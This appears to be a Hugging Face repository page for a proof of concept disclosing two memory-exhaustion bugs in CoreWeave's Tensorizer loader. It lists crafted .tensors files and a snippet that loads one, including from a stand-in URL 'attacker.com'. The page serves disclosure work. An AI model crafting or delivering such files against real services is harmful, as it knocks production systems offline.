Downloads · 30 days
0
0xiviel/poc-tensorizer-dos
poc-tensorizer-dos is a machine learning model from 0xiviel. Use it for the machine learning task on the model card, and read the license before you ship it in a product.
CoreWeave's Tensorizer library has two independent uncontrolled memory allocation vectors when loading .tensors files. Both read unsigned 64-bit integers from untrusted file data and use them directly for allocation w…
Downloads · 30 days
0
Access
Public
Updated Feb 6, 2026
Repo size
—
Likes
0
Public
Click a slice to open those files.
.py7 KB · 67%
From the Hugging Face model README
CoreWeave's Tensorizer library has two independent uncontrolled memory allocation vectors when loading .tensors files. Both read unsigned 64-bit integers from untrusted file data and use them directly for allocation without any upper bound validation.
Vector 1 — Metadata total_len (serialization.py:841):
A crafted 73-byte file triggers reader.read(18,446,744,073,709,551,615) (~18.4 exabytes)
Vector 2 — Tensor header_len (serialization.py:646):
A crafted 125-byte file triggers bytearray(18,446,744,073,709,551,615) (~18.4 exabytes)
malicious_metadata_dos.tensors — 73-byte file, triggers metadata allocation DoSmalicious_8gb_dos.tensors — 73-byte file, triggers 8GB metadata allocationmalicious_header_dos.tensors — 125-byte file, triggers per-tensor header allocation DoScreate_malicious_tensors.py — Script to generate all PoC filesfrom tensorizer import TensorDeserializer
# This triggers a MemoryError or OOM kill:
d = TensorDeserializer('malicious_metadata_dos.tensors')
# Also works from remote URL (common production usage):
d = TensorDeserializer('https://attacker.com/malicious.tensors')
These files only cause memory allocation attempts. No code is executed.